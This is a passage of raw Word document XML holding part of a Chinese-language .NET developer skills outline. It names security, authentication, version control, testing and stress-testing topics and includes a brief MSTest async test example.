      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>配置文件、备份文件暴露读取、未授权修改、未授权上传</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>逻辑安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>未授权访问、上下流程顺序可乱序、无限递归</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>二进制安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（VS中有性能分析工具）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>堆栈溢出(很多人都碰过)、缓存区溢出、内存泄漏</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Web认证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>第三方认证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Oauth2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Json Web Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SSO单点登录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>同源策略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CAS解决方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IIs/.Net认证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Basic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Digest Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Forms</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解决方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代码管理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Git：免费、开源的分布式版本控制系统，用的人最多</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Svn：集中式的版本控制系统，一个强大的备份服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TFS：微软源代码管理工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>自动化测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UI测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VS自带的UI测试工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MS Test 如何测试异步方法呢？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们只需为异步方法添加async和Task，然后在await一下异步方法即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[Test]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>public async Task SynchronizeTestWithCodeViaAwait()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>  var sut = new SystemUnderTest();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>  // Schedule operation to run asynchronously and wait until it is finished.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>  await sut.StartAsync();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>  // Assert outcome of the operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>  Assert.AreEqual("Init Work", sut.Message);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>单元测试(Unit Testing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tdd测试驱动开发（Test-Driven Development）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VS自带的单元测试工具，Xunit，Nunit，Moq，Faker.Net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>性能分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VS自带的性能分析工具，MiniProfiler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>压力测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>吞吐率(Throughput)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>QPS每秒查询率(Query Per Second)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TPS每秒事务数(Transaction Per Second)，并发用户数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
